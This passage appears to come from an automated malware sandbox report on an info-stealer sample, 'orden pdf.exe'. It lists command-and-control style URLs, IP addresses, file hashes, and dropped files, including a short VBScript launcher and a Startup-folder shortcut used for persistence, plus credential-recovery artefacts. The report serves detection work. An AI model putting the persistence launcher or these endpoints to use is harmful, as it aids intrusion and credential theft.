                                            • www.bowvacare.com/t052/?M6q=06P2zHFBNwkKcjxMW0ZYnVSUrZOYMIqYn0jW4t9Sv865mvbN3fk+T6GUQHx6WgnVjsEH&q48=Gbthj2r8e
                                            ORDER 172IKL0153094.exeGet hashmaliciousBrowse
                                            • www.promotionalplacements.com/0wdn/?4h3=jmYaOKlr+2FfAeZahyaTAMJRjN0ako2uRB7ye7tFiJ41vzJNH4E+JCCo9bv18+DMvIbBTiiRsA==&vR-TR=LJEtYNu
                                            siYRtE23mD.exeGet hashmaliciousBrowse
                                            • www.type3cannabis.com/oj6t/?ojrXP=kqMYwQk82t2T1Lt8pU6YEmj/eoYCnhRMTPksyGfrTy2ILdLjMrXXGK4BNP2S2VSRUoMu&KN6p=FVplxlNplH1p8Zd
                                            PRODUCT INQUIRY BNQ1.xlsxGet hashmaliciousBrowse
                                            • www.mypetwellnessstore.com/coz3/?RFN4=ajqb1vM6sB/4IAKhvG3/c5mVsBLkf/xD4kRwCEIdAqloaMXfIV7wZTIJ/T39KnARMqvxIw==&RB=NL00JzKhBv9HkNRp
                                            STATEMENT NOV20.xlsxGet hashmaliciousBrowse
                                            • www.monetizemybizadvertisers.com/ogg/?TD=oP2tstFPZDvxz0&MBZ8xB=g8xKdXZufOnEIPV2KjWZylhEF0u3+INtUX5rBLROJ4vaYn14A+wO7JT1W6f+JZrPnVjFLw==
                                            New Additional Agreement.exeGet hashmaliciousBrowse
                                            • www.owner.codes/bw82/?J2JxbNH=7PTVdedASbqXwdeJ7Nsx6Z4+deFvCf6zRKQ0g09ISedI/B2MYyGtMzQZmx0vvrAl+DVW&BXEpz=Z2Jd8XTPeT
                                            Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                            • www.owner.codes/bw82/?K4k0=7PTVdedASbqXwdeJ7Nsx6Z4+deFvCf6zRKQ0g09ISedI/B2MYyGtMzQZmx0vvrAl+DVW&dDH=P0GPezWpdVGtah
                                            Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                            • www.beauskitchen.com/bw82/?RR=L++B11gAAOUjb7FCpgjqLOCb3aeUZtTuQ2/xcMSvZ8K7RWmMRTDMsQHRNHFTLEUTkmC2R4zrOw==&E6A=8pMPQv
                                            mFNIsJZPe2.exeGet hashmaliciousBrowse
                                            • www.beauskitchen.com/bw82/?tHrp=9r7HOjb8jFFtz&sBZXxj6=L++B11gAAOUjb7FCpgjqLOCb3aeUZtTuQ2/xcMSvZ8K7RWmMRTDMsQHRNEppIF4onRjn
                                            Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                            • www.owner.codes/bw82/?elX=7PTVdedASbqXwdeJ7Nsx6Z4+deFvCf6zRKQ0g09ISedI/B2MYyGtMzQZmyU/gKQdgm8R&uVj0=M494u
                                            AWB# 9284730932.exeGet hashmaliciousBrowse
                                            • www.progressionglobaleducation.com/o9bs/?JfELt4Gh=e2WuzP2KL7Qag3Mk7Lwr0NOS4E7DIhoQd6IjkNRlnbrRjVPd72EWKLDkHxRcUFIv776Y&ojq0d=SzuPdV
                                            DEWA PROJECT 12100317.exeGet hashmaliciousBrowse
                                            • www.beauskitchen.com/bw82/?Sh=L++B11gAAOUjb7FCpgjqLOCb3aeUZtTuQ2/xcMSvZ8K7RWmMRTDMsQHRNEpDX1IojTrn&RZB=dnrxRrdHFPe8sx
                                            HussanCrypted.exeGet hashmaliciousBrowse
                                            • www.cleo.vision/cia6/?T8eD=Q6D9YgNFyKyA4HKU1w92ahXplO0nGtsIjLqzul1Tx979rO99WlQEjhbEVqJR4QMaoqe0&-ZSD=1b0hlT
                                            OD-14102020 PDF.exeGet hashmaliciousBrowse
                                            • www.antepsarayi.com/ian/?OjN0X=YqujN5NNKTKJ4IQKy0GvxKse8tEykRuk5KTVF3//lhxgKXTH6gN0X1UV9ItiZ3Ki3iv0&TT=fbdDrHkHTjTdv
                                            34.102.136.180J0OmHIagw8.exeGet hashmaliciousBrowse
                                            • www.epicmassiveconcepts.com/csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT
                                            zHgm9k7WYU.exeGet hashmaliciousBrowse
                                            • www.ricardoinman.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl
                                            JAAkR51fQY.exeGet hashmaliciousBrowse
                                            • www.epicmassiveconcepts.com/csv8/?EZUXxJ=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&DzrLH=VBZHYDrxndGXyf
                                            65BV6gbGFl.exeGet hashmaliciousBrowse
                                            • www.outlawgospelshow.com/kgw/?D81dO=3dsCTSsKJfcfLyYHdfjcimIAevlOxP45YAOPNmiGb3RckDOY5KdZ2EMbApwY76ndqYux&tTrL=Fpgl
                                            YvGnm93rap.exeGet hashmaliciousBrowse
                                            • www.crafteest.com/8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH
                                            Order_00009.xlsxGet hashmaliciousBrowse
                                            • www.brainandbodystrengthcoach.com/csv8/?1bwhC=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&tB=TtdpPpwhOlt
                                            13-01-21.xlsxGet hashmaliciousBrowse
                                            • www.kolamart.com/bw82/?x2J8=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&Ab=gXuD_lh8bfV4RN
                                            NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                            • www.gdsjgf.com/bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf-
                                            PO85937758859777.xlsxGet hashmaliciousBrowse
                                            • www.bodyfuelrtd.com/8rg4/?RJ=A4ItsHP7WirPGvorxE1FqdRUH2iuHEJ7Bx0GuGGPjza4UX3M9OXu5uVQhTJ1ITDXtosJtw==&LFQHH=_pgx3Rd
                                            Order_385647584.xlsxGet hashmaliciousBrowse
                                            • www.oohdough.com/csv8/?NP=oR+kRp92OlWNPHb8tFeSfFFusuQV5SLrlvHcvTTApHN9lxDZF+KzMj/NshbaIk6/gJtwpQ==&nN6l9T=K0GdGdPX7JyL
                                            PO#218740.exeGet hashmaliciousBrowse
                                            • www.epochryphal.com/wpsb/?Wxo=n7b+ISrk/mPyWzbboTpvP41tNOKzDU5etPpa3uuDPgrT9THM2mbO6pyh4trMr+rUEpul&vB=lhv8
                                            20210111 Virginie.exeGet hashmaliciousBrowse
                                            • www.mrkabaadiwala.com/ehxh/?Gzux=8Ka3Lv4ePZYbHHrfWWyIjg6yKJpjzOn7QTDTNOD0A86ZD78kMrm+GgFnyvrieFQhDFXfm2RQfw==&AnB=O0DToLD8K
                                            20210113155320.exeGet hashmaliciousBrowse
                                            • www.ortigiarealty.com/dkk/?BZ=59qCdC3RMUvEyWKLbbpm6Z+GlV/JTwbDjS9GwZYTXRwVfK7Z9ENGl/302ncjjG4TtqPC&I6A=4hOhA0
                                            13012021.exeGet hashmaliciousBrowse
                                            • www.sydiifinancial.com/rbg/?-ZV4gjY=zsOc27F1WxfzCuYGlMZHORhUu2hDO+A8T5/oUCY+tOSiKp0YV+JX8kcBbP6nsiP5HbIi&-ZSl=1bgPBf
                                            Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                            • www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct
                                            FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                            • www.abilitiesin.com/umSa/?8p=z9MTiPW3cvjSA5QkES0lRL7QE5QWzpSIb/5mf6QApKD6hYKwb/M4i12nx+gX2coGSm9PIjo5qw==&o2=jL30vpcXe
                                            6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                            • www.vettedwealthmanagement.com/umSa/?ET8T=brJeVU7eljMQcn5t6nrZLyoDpHpFr+iqwzUSRB88e+cRILPvJ2TiW12sA30gV7y33iXX&URfl=00DdGJE8CBEXFLip
                                            Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                            • www.basalmeals.com/h3qo/?CR=nh/gKqoyV5HeFjYxMy0eFbMJOpM49Sz3DGf/FH2Dw3liEqigPonoEfAZFGiauGMw1oau&RX=dnC44rW8qdHLY2q
                                            5DY3NrVgpI.exeGet hashmaliciousBrowse
                                            • www.schustermaninterests.com/de92/?FdC4E2D=otFI+gArfm9oxno+NlFHPe8CZ87dio0DjOpD7CEQ1ohXI6jwcMVL1BNDFt16zf60LSstTEfOYg==&AjR=9r4L1
                                            xrxSVsbRli.exeGet hashmaliciousBrowse
                                            • www.luxpropertyandassociates.com/nki/?yrsdQvAx=9rwO08mLgykW/+F5WoH4KAy1ieMCsMl+05AKyLP7HaXoaQuR30wAwJPKQnvqcJUpdIyD&D8h8=kHux

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comrT3Nb3Nhqp.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            Swift transferi pdf.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            0XrD9TsGUr.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            Payment Advice.xlsxGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            099898892.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            Nuevo pedido.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            BBTNC09.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            h3dFAROdF3.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            53McmgaUJP.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            po.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            BsR85tOyjL.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            3Y690n1UsS.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            Z4bamJ91oo.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            hO3eV0L7FB.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            U0N4EBAJKJ.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            aG2hS5oQsq.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            zISJXAAewo.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            CLxJeVvzMA.exeGet hashmaliciousBrowse
                                            • 3.223.115.185

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            AMAZON-AESUSMatrix.exeGet hashmaliciousBrowse
                                            • 54.234.205.119
                                            YvGnm93rap.exeGet hashmaliciousBrowse
                                            • 54.208.77.124
                                            0113_1010932681.docGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            0113_203089882.docGet hashmaliciousBrowse
                                            • 50.19.243.236
                                            0113_88514789.docGet hashmaliciousBrowse
                                            • 54.235.83.248
                                            W0rd.dllGet hashmaliciousBrowse
                                            • 23.21.140.41
                                            W0rd.dllGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            Order_00009.xlsxGet hashmaliciousBrowse
                                            • 35.172.94.1
                                            PO85937758859777.xlsxGet hashmaliciousBrowse
                                            • 52.201.79.206
                                            IMG_2021_01_13_1_RFQ_PO_1832938.docGet hashmaliciousBrowse
                                            • 54.224.10.186
                                            0113_35727287.docGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            W0rd.dllGet hashmaliciousBrowse
                                            • 54.243.119.179
                                            0fiasS.dllGet hashmaliciousBrowse
                                            • 54.243.119.179
                                            01_extracted.exeGet hashmaliciousBrowse
                                            • 184.73.247.141
                                            DHL_Jan 2021 at 1.M_9B78290_PDF.exeGet hashmaliciousBrowse
                                            • 23.21.252.4
                                            QUOTE_98876_566743_233.exeGet hashmaliciousBrowse
                                            • 52.20.197.7
                                            20210111 Virginie.exeGet hashmaliciousBrowse
                                            • 52.202.22.6
                                            DHL_Jan 2021 at 13M_9B7290_PDF.exeGet hashmaliciousBrowse
                                            • 54.243.164.148
                                            cGLVytu1ps.exeGet hashmaliciousBrowse
                                            • 54.208.77.124
                                            4600031748.exeGet hashmaliciousBrowse
                                            • 54.225.66.103
                                            GOOGLEUSJ0OmHIagw8.exeGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            zHgm9k7WYU.exeGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            JAAkR51fQY.exeGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            65BV6gbGFl.exeGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            YvGnm93rap.exeGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            ACH WIRE PAYMENT ADVICE..xlsxGet hashmaliciousBrowse
                                            • 108.177.126.132
                                            VFe7Yb7gUV.exeGet hashmaliciousBrowse
                                            • 8.8.8.8
                                            cremocompany-Invoice_216083-xlsx.htmlGet hashmaliciousBrowse
                                            • 216.239.38.21
                                            Order_00009.xlsxGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            13-01-21.xlsxGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            PO85937758859777.xlsxGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                                            • 108.177.127.132
                                            Order_385647584.xlsxGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            rB26M8hfIh.exeGet hashmaliciousBrowse
                                            • 8.8.8.8
                                            brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                            • 216.239.34.21
                                            WFLPGBTMZH.dllGet hashmaliciousBrowse
                                            • 108.177.126.132
                                            PO#218740.exeGet hashmaliciousBrowse
                                            • 34.98.99.30
                                            20210111 Virginie.exeGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            20210113155320.exeGet hashmaliciousBrowse
                                            • 34.102.136.180
                                            SEDO-ASDERFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.docGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            PO#218740.exeGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            cGLVytu1ps.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            Doc_74657456348374.xlsx.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            Consignment Details.exeGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            Purchase Order -263.exeGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            zz4osC4FRa.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            btVnDhh5K7.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            SecuriteInfo.com.Trojan.Inject4.6535.29715.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            Pending PURCHASE ORDER - 47001516.pdf.exeGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            order no. 3643.exeGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            Details!!!!.exeGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            rtgs_pdf.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            http://walmartprepaid.comGet hashmaliciousBrowse
                                            • 91.195.240.136
                                            P.O-45.exeGet hashmaliciousBrowse
                                            • 91.195.241.137
                                            order FTH2004-005.exeGet hashmaliciousBrowse
                                            • 91.195.241.137

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1550336
                                            Entropy (8bit):6.795101471729671
                                            Encrypted:false
                                            SSDEEP:24576:Atb20pkaCqT5TBWgNQ7a23dZXEGpDMOvzgL6A:JVg5tQ7aQMg25
                                            MD5:4F1AD14256CC9C420D78D69B468BAB48
                                            SHA1:7734BEEC32B17C6EF0678533CC9634BD2C890C65
                                            SHA-256:1F05B369246B2867A66ABA3CACD9DA9C2F29C03ADC4D45883C91054C35AC3345
                                            SHA-512:38DBBF685B18D2540D739B0FF74BB00F20A1E0B1C142E40B7BBB2E451F6D8EA9E992EB01F77EFF945A47BC57FB6ADA9E184DD9D6F07E732C253449509DEEEC71
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 33%
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L......_..........".................t_............@.......................................@...@.......@......................p..|....@.......................`..Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc........@......................@..@.reloc..t....`......................@..B................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\DB1
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                            Category:dropped
                                            Size (bytes):40960
                                            Entropy (8bit):0.792852251086831
                                            Encrypted:false
                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1550336
                                            Entropy (8bit):6.795101471729671
                                            Encrypted:false
                                            SSDEEP:24576:Atb20pkaCqT5TBWgNQ7a23dZXEGpDMOvzgL6A:JVg5tQ7aQMg25
                                            MD5:4F1AD14256CC9C420D78D69B468BAB48
                                            SHA1:7734BEEC32B17C6EF0678533CC9634BD2C890C65
                                            SHA-256:1F05B369246B2867A66ABA3CACD9DA9C2F29C03ADC4D45883C91054C35AC3345
                                            SHA-512:38DBBF685B18D2540D739B0FF74BB00F20A1E0B1C142E40B7BBB2E451F6D8EA9E992EB01F77EFF945A47BC57FB6ADA9E184DD9D6F07E732C253449509DEEEC71
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 33%
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L......_..........".................t_............@.......................................@...@.......@......................p..|....@.......................`..Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc........@......................@..@.reloc..t....`......................@..B................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\KN26O6T1\KN2logim.jpeg
                                            Process:C:\Windows\SysWOW64\systray.exe
                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                            Category:dropped
                                            Size (bytes):109281
                                            Entropy (8bit):7.92040397877183
                                            Encrypted:false
                                            SSDEEP:3072:Ih9p38GEbg2wzYJX+djpxXZMtk2AB4s8oxWzzzTlXUFg:S9p38GEUfHVma2O78oxgD
                                            MD5:CE6475451E00631C8ED264DECD02599A
                                            SHA1:529116F09AD9A0CAAFA89239BBCA3A6D4EB50B55
                                            SHA-256:ACEEDE456C82C2EFF4D4A3E0E3325E8D9DA10479559D667F0BA5978B80BE4F17
                                            SHA-512:D1C64ECECCAC3942D39718B0F8DF922A9C189A8EF49B5E6EDBA93E345A69807C0917CE6B019488379CF3A9CB1E099BE48E40B0925E6129428A270039C9E2D950
                                            Malicious:false
                                            Reputation:low
                                            Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(.._.C.....B...-..h.Dh......{..J*.qNN...Z......?......................./.H.v..O.|......I"]Z...I.y..[
                                            C:\Users\user\AppData\Roaming\KN26O6T1\KN2logrg.ini
                                            Process:C:\Windows\SysWOW64\systray.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):38
                                            Entropy (8bit):2.7883088224543333
                                            Encrypted:false
                                            SSDEEP:3:rFGQJhIl:RGQPY
                                            MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                            SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                            SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                            SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: ....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                                            C:\Users\user\AppData\Roaming\KN26O6T1\KN2logri.ini
                                            Process:C:\Windows\SysWOW64\systray.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):40
                                            Entropy (8bit):2.8420918598895937
                                            Encrypted:false
                                            SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                            MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                            SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                            SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                            SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                            Malicious:true
                                            Preview: ....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                            C:\Users\user\AppData\Roaming\KN26O6T1\KN2logrv.ini
                                            Process:C:\Windows\SysWOW64\systray.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):210
                                            Entropy (8bit):3.4669102148080584
                                            Encrypted:false
                                            SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4UABYloEoY:MlIaExGNYvOI6x4UABYlkY
                                            MD5:42A1C97322FFB332CB284007F720EC75
                                            SHA1:B824EB8A23C3669D283AD76174C80FA26412D428
                                            SHA-256:67F95B6BD635AC5B715D60133F9B5862594DBAF144049E9EED6C3A83A7432094
                                            SHA-512:AC78677E64FABF82F19F3288AAF483DBA0EF0E4C02F03AB0595B5CE3B0B61C3FB1ADD447B42EFE09B07293D85E810C90916BA2650F024C42F6D77BE7330B2D55
                                            Malicious:true
                                            Preview: ...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.s.e.o.z.m.t.d.q.z.l.i.u.r.x.....A.u.t.:.......P.a.s.s.:.......
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
                                            Process:C:\Windows\explorer.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Read-Only, Directory, ctime=Wed Apr 11 22:38:20 2018, mtime=Thu Jan 14 04:13:02 2021, atime=Thu Jan 14 04:13:02 2021, length=8192, window=hide
                                            Category:modified
                                            Size (bytes):11875
                                            Entropy (8bit):3.1804535272240964
                                            Encrypted:false
                                            SSDEEP:96:8ZxXpsTW0hAdRWkdBO7wu3IOsWeXOsTW0ozdRWk8nb/a:8Gq0SdUcdtq0+dUDa
                                            MD5:1431C5809358D89F20A3AF4C99ED7139
                                            SHA1:901E4F43BF9A1E22E9AFB1B67E2FE29DEFB201AB
                                            SHA-256:7EDB873D2EE70A9375E346917ECCA8B461CDB476770B69E04E22C39069A7AC4A
                                            SHA-512:840A0A38AEA60A3B196E50DB0CBF446C67D027AEF34AD44C1AB4C4D3BD3B23AA1EF3C5FC084EB598B5029FDBD2313B4BA29DD725E7A63AC24986A880CDA93968
                                            Malicious:false
                                            Preview: L..................F...........,.....&..3....&..3.... ...........................P.O. .:i.....+00.../C:\.....................1......R.)..PROGRA~2.........L..R.)....................V.......#.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.......E...............-.......D...........@.?......C:\Program Files (x86)..`.......X.......computer..!a..%.H.VZAj...U%.$'V........-..!a..%.H.VZAj...U%.$'V........-.r.......-...1SPSU(L.y.9K....-........................9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url
                                            Process:C:\Users\user\Desktop\orden pdf.exe
                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\assignedaccessproviderevents\.vbs>), ASCII text, with CR line terminators
                                            Category:dropped
                                            Size (bytes):79
                                            Entropy (8bit):4.630640678497035
                                            Encrypted:false
                                            SSDEEP:3:HRAbABGQVuOWXp5/feABo4LT2n:HRYF5OWXpkh4LT2
                                            MD5:E26FCBEC7D7F5645A042CD8ECABA9C12
                                            SHA1:B01931C3851E0DA006F62A368A7D8D3FEBEE9A00
                                            SHA-256:ABF2B2B43A3B5C48AC486C2FF780C8933A75EDAB16CFCFFF6DF6C25BB7F19877
                                            SHA-512:78A3263E8A65E4580AD28E569A1FD82226FDB3B2A04AEFA73D6BEFE0E6B8526C70A7EC8C01327D31F07B6EACCC39B53F24C0BE284D63D934C16FEB335FEAFF97
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: Methodology_Suspicious_Shortcut_Local_URL, Description: Detects local script usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url, Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
                                            Preview: [InternetShortcut].URL=file:///C:\Users\user\assignedaccessproviderevents\.vbs
                                            C:\Users\user\assignedaccessproviderevents\.vbs
                                            Process:C:\Users\user\Desktop\orden pdf.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):137
                                            Entropy (8bit):4.675174417731891
                                            Encrypted:false
                                            SSDEEP:3:jaPcYonh3QBHoWXp5/feABo4hriQSHn:jk+h8IWXpkh4hOL
                                            MD5:DB5C80C48C179D717EE7AE1CC6F050CB
                                            SHA1:25DCF4FDE3CCD5983DC5B7BFCD9693F2B5D27654
                                            SHA-256:A3DAE6CCC4FA2C5A30511F2654699C07C948B4C428494E092CB76D75BD1943E4
                                            SHA-512:66B737706C45C71C20B5EAD7BC95094EE05011ACE0E4F7BDB23BFA124CF141F30574A2C62B4C9C8E49DEC16FC438F4CB99A8142847949CEA3361881FE7447CF2
                                            Malicious:false
                                            Preview: Set WshShell = WScript.CreateObject("WScript.Shell")..WshShell.Run """C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe"""
                                            C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe
                                            Process:C:\Users\user\Desktop\orden pdf.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1550336
                                            Entropy (8bit):6.795101471729671
                                            Encrypted:false
                                            SSDEEP:24576:Atb20pkaCqT5TBWgNQ7a23dZXEGpDMOvzgL6A:JVg5tQ7aQMg25
